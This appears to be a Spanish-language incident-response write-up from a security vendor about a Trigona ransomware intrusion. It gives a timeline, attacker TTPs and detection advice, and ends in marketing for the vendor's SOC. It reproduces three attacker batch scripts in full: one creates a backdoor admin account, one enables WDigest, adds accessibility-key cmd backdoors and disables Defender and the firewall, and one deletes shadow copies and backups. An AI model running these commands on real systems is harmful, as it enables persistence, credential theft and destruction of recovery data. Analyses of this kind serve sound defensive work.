Caso real: Empresa víctima de Trigona Ransomware en noviembre de 2023 (nombre del cliente y sector omitidos por confidencialidad)
🔑 Puntos clave
| Hora/Fecha (CET) | Evento |
|---|---|
| 4 Nov - 11:41 | Acceso inicial mediante credenciales válidas a servicio RDWeb expuesto. Instalación de TeamViewer y SplashTop para mantener persistencia. |
| 4 Nov - 13:00 | Movimiento lateral al servidor SQL interno usando mismo usuario administrador local. Creación de nuevo usuario “sys” con privilegios de administrador. |
| 4 Nov - 14:30 | Ejecución de zam.bat: habilitación de WDigest, activación de RDP, deshabilitación de Windows Defender y modificaciones de registro para evadir defensas. |
| 5-7 Nov | Reconocimiento con NetScan (SoftPerfect) para descubrir equipos con RDP y SMB habilitado. Instalación de MeshAgent (MeshCentral) para ejecución remota de comandos. |
| 8 Nov - 23:09 | Instalación de IOBit Unlocker para copiar archivos bloqueados (bases de datos SQL en uso). Inicio de exfiltración de datos mediante rclone hacia pCloud. |
| 9 Nov - 19:44 | Transferencia y ejecución en memoria de mimikatz cifrado (423844210.dat) mediante SplashTop. Captura de credenciales de administradores de dominio gracias a WDigest habilitado. |
| 12 Nov - 01:00 | Detonación masiva de Trigona ransomware usando credenciales de Domain Admin. Conexiones RDP y SMB a servidores críticos, archivos y backups. Cifrado de infraestructura completa. |
| 12 Nov - 03:01 | Ejecución de coba.bat: borrado de Shadow Copies, backups y deshabilitación del sistema de recuperación. Uso de Wise Force Deleter para borrar bases de datos SQL no cifradas. |
🪲 Obteniendo persistencia tras el acceso inicial
Los atacantes comenzaron instalando TeamViewer y SplashTop en la máquina comprometida durante el día 4 de noviembre de 2023 a las 11:41 mediante el usuario Administrador local del sistema expuesto para asegurar la persistencia.
La ausencia de intentos de fuerza bruta y el uso de credenciales válidas sugieren que el actor de amenazas pudo haber obtenido la contraseña del Administrador local de la maquina expuesta a través de filtraciones o compra a un IAB (Initial Access Broker), especialmente considerando otros eventos de acceso externo en las semanas previas a la intrusión.
↹ Movimiento lateral al servidor SQL principal
El inicio del compromiso se identificó tras un movimiento lateral de la máquina RD expuesta al servidor SQL interno mediante el mismo usuario administrador local que fue usado para el acceso inicial.
Tras acceder con permisos de administrador local en el servidor SQL, se creó un fichero llamado “newuser.bat” que creaba otro usuario Administrador Local en la máquina SQL llamado “sys”.
newuser.bat - Creacion de nuevo usuario “sys” con contraseña “t1518061-“ (Adminsitrador local y RDP)
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "=") Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user sys t1518061- /add
net localgroup %AdmGroup% sys /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "=") Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" sys /add
net accounts /maxpwage:unlimited
🥷 Tácticas de Evasión de Defensas
Tras crear este usuario, se usó el usuario “sys” para mediante otro batch script modificar el registro de windows y habilitar WDigest (almacenamiento de credenciales en caché), habilitar RDP mediante una regla del firewall de Windows y deshabilitar Windows Defender.
zam.bat (Habilita WDigest, Habilita RDP, Deshabilita Windows Defender)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v fDenyTSConnections /t REG_DWORD /d 00000000
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v fAllowUnsolicited /t REG_DWORD /d 00000001
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v UserAuthentication /t REG_DWORD /d 00000000
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /f /v SecurityLayer /t REG_DWORD /d 00000001
reg add HKLM\SYSTEM\CurrentControlSet\services\WinDefend /v Start /t REG_DWORD /d 4 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v DisableCAD /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2
🔍 Tareas de reconocimiento y movimiento lateral
🌐 Uso de NetScan (alternativa a nmap)
Durante la intrusión se copió y ejecutó la herramienta “netscan.exe” de SoftPerfect Ltd. en C:\Users\Administrador\Pictures\netscan\netscan.exe en varios de los servidores a medida que se iban comprometiendo para el descubrimiento de los demás equipos de la red con RDP y SMB habilitado, así como los servicios de bases de datos de otros servidores de la red.
📁 Exfiltración de datos
🔓 Habilitando la lectura de ficheros bloqueados mediante IOBit Unlocker
Cuatro días después de ejecutar el script “zam.bat”, el 8 de noviembre de 2023 a las 23:09, los cibercriminales instalaron el software “IOBit Unlocker” para facilitar la copia de ficheros y la lectura de archivos bloqueados, como por ejemplo la base de datos SQL, la cual no se puede copiar si está en uso por otro proceso.
☁️ Uso de pCloud y exfiltración mediante rclone
Usando este método de desbloqueo de ficheros mediante IOBit Unlocker, se consiguió copiar y robar varios información de la base de datos y el servidor SQL usando el servicio de nube privada www.pcloud.com y el programa de copia remota de ficheros rclone.
El fichero de configuración de rclone estaba cifrado. La contraseña usada se cifra con un hash SHA-256, que produce la clave para conectarse al servidor. La contraseña hasheada no se almacena en el fichero de configuración.
Este tipo de OPSEC muestra una experiencia destacable por parte del grupo que otro actor de amenazas menos experimentado podría pasar por alto.
Uso de SnipeDrive para listado de ficheros y directorios
Durante la fase de exfiltración vimos que el actor de amenazas utilizó un programa denominado “sd.exe” (SnipeDrive).
El programa “sd.exe” es un binario autoextraíble que despliega una herramienta llamada “Snap2HTML.exe” junto con un archivo batch diseñado para ejecutar esta herramienta en cada unidad de disco. La funcionalidad de Snap2HTML es interesante para los actores de amenazas, ya que permite tomar una “instantánea” de las estructuras de carpetas en un disco duro y guardarlas como archivos HTML.
Este listado lo utilizaron para identificar rápidamente los archivos de interés, planificar la exfiltración de datos y documentar la estructura de archivos de la empresa víctima.
⬆️ Escalando de Administrador Local a Domain Admin
Uso de mimikatz (packed, in-memory execution)
Un día después de instalar IObit Unlocker y tras la exfiltración de datos, el 9 de noviembre de 2023 a las 19:44, se copió el fichero “423844210.dat” mediante SplashTop el cual contenía una versión cifrada de la herramienta mimikatz la cual se ejecutaba en memoria para evadir el EDR. Tras su ejecución el grupo de ransomware obtuvo los credenciales de varios administradores del dominio que habían iniciado sesión en el servidor SQL con WDigest habilitado.
💥 Detonación del Ransomware mediante RDP y SMB
El 12 de noviembre de 2023 a la 1:00, usando el servidor SQL como pivote, establecieron múltiples conexiones RDP hacia sistemas críticos usando los credenciales de administradores del dominio, incluyendo varios servidores de archivos y de copias de seguridad en los que también copiaron y ejecutaron el ransomware Trigona.
El ransomware también inició conexiones SMB a otros hosts remotos como los NAS y el controlador del dominio principal y secundario, cifrándolos también.
🗑️ Borrado de Copias y Bases de Datos tras la Detonación
Borrado de Shadow Copies y Deshabilitado Sistema de Recuperación de Windows
Tras la ejecución del ransomware, el 12 de noviembre de 2023 a las 3:01 los actores de amenazas desplegaron y ejecutaron masivamente un fichero llamado “coba.bat” para el borrado de Shadow Copies y para deshabilitar el sistema de recuperación de Windows.
coba.bat
timeout /t 1 /nobreak
wbadmin delete systemstatebackup -quiet
wbadmin delete backup -quiet
wmic shadowcopy delete
bcdedit /set {default} recoveryenabled no
vssadmin list shadows
timeout /t 1 /nobreak
vssadmin delete shadows /all /quiet
timeout /t 1 /nobreak
net stop "Microsoft Software Shadow Copy Provider"
net stop "Volume Shadow Copy"
net stop "System Restore Service"
Uso de Wise Force Deleter para borrar las bases de datos SQL
Tras la detonación del ransomware el actor de amenazas también uso “WiseDeleter.exe” de manera manual para borrar la base de datos SQL, la cual no había sido cifrada por el ransomware dado que el servicio SQL estaba levantado e impedía la escritura por parte del ransomware Trigona.
🔍 Detección y IOCs (Indicadores de Compromiso)
Direcciones IP
Hashes y archivos relacionados
URLs en VirusTotal
🧩 Cómo nuestro Adversary-Aware SOC habría prevenido este ataque
Nuestro Adversary-Aware SOC está diseñado específicamente para identificar y neutralizar tácticas de ransomware como las utilizadas por Trigona:
| Área de Defensa Merabytes | Cómo actuó nuestro SOC | Resultado obtenido |
|---|---|---|
| Protección de identidades (Cisco Duo 2FA en equipos y cuentas) | Bloqueo inmediato de accesos RDWeb y RDP no validados, incluso con credenciales robadas o filtradas. | Se corta el vector inicial de acceso. |
| Endpoint Protection con reglas antiransomware | Detención de procesos de cifrado masivo, ejecución de vssadmin delete shadows y coba.bat. |
El cifrado se detiene en los hosts iniciales. |
| Análisis de Active Directory continuo | Alertas de creación de cuentas privilegiadas (“sys”) y modificaciones de registro sospechosas (WDigest habilitado). | Contención rápida antes del movimiento lateral. |
| Backdoor hunting (TeamViewer, SplashTop, MeshAgent) | Identificación y eliminación de herramientas de acceso remoto no autorizadas. | Eliminación de persistencia del atacante. |
| Detección de herramientas de reconocimiento | Alertas de ejecución de NetScan, IOBit Unlocker y herramientas de exfiltración (rclone). | Bloqueo del reconocimiento y exfiltración. |
| Monitorización de comportamiento anómalo | Detección de conexiones salientes a pCloud, ejecución en memoria de mimikatz cifrado. | Prevención de robo de credenciales y exfiltración. |
| Análisis de vulnerabilidades continuo | Detección previa de servicios RDWeb expuestos sin 2FA, con alerta temprana y recomendación de parcheo/hardening. | Ataque prevenido antes de explotación. |
Gracias a la mentalidad centrada en el adversario, nuestro SOC entiende las TTPs (Tácticas, Técnicas y Procedimientos) de grupos de ransomware como Trigona. Monitorizamos activamente los IOCs conocidos, patrones de comportamiento de ransomware y técnicas de evasión para detener ataques en sus etapas iniciales, antes de que puedan causar daño significativo.
📚 Lecciones aprendidas
Conclusión
El ataque fue exitoso porque no existía una defensa adaptativa ni un monitoreo continuo. Con Merabytes, la historia habría terminado diferente:
Si te interesa acceder a otros informes privados o reglas específicas para EDR/XDR, visita merabytes.com y solicita acceso a nuestros servicios avanzados de protección de endpoints + análisis de vulnerabilidades continuo.
Descubre cómo nuestro Adversary-Aware Security Operations Center identifica y neutraliza amenazas de forma proactiva antes de que impacten tu negocio.
Un Adversary-Aware SOC va más allá del monitoreo de seguridad tradicional al comprender las tácticas, técnicas y procedimientos (TTPs) de los atacantes. Cazamos amenazas de forma proactiva usando el framework MITRE ATT&CK, análisis de comportamiento e inteligencia de amenazas para detectar ataques que evaden los controles de seguridad convencionales.
Las herramientas de seguridad tradicionales se enfocan en firmas e indicadores conocidos. Nuestra detección por comportamiento analiza anomalías en la actividad de usuarios, patrones de correo, tráfico de red y comportamiento del sistema para identificar ataques sofisticados que usan herramientas legítimas o evaden controles de autenticación. Esto detectó los ataques en estos casos de estudio antes de que ocurriera un daño significativo.
Nuestro SOC opera 24/7 con monitoreo en tiempo real y capacidades de respuesta automatizada. Las alertas críticas activan investigación inmediata y acciones de contención en minutos. Proporcionamos caza de amenazas continua, análisis forense y respuesta coordinada a incidentes para minimizar el impacto y prevenir el movimiento lateral.
Combinamos feeds de inteligencia de amenazas globales con nuestra propia investigación de incidentes reales. Cada ataque que analizamos contribuye a nuestras reglas de detección y base de datos de IOCs, que se comparte inmediatamente en todos los entornos protegidos. Esto significa que si vemos un nuevo patrón de ataque contra un cliente, todos los clientes están automáticamente protegidos en horas.
Absolutamente. Nuestro SOC se integra con sus herramientas existentes de EDR, XDR, SIEM, firewalls, seguridad de correo y protección de identidad. Mejoramos su efectividad correlacionando eventos de todas las fuentes, aplicando lógica de detección consciente de adversarios y proporcionando análisis humano experto que las herramientas automatizadas por sí solas no pueden lograr.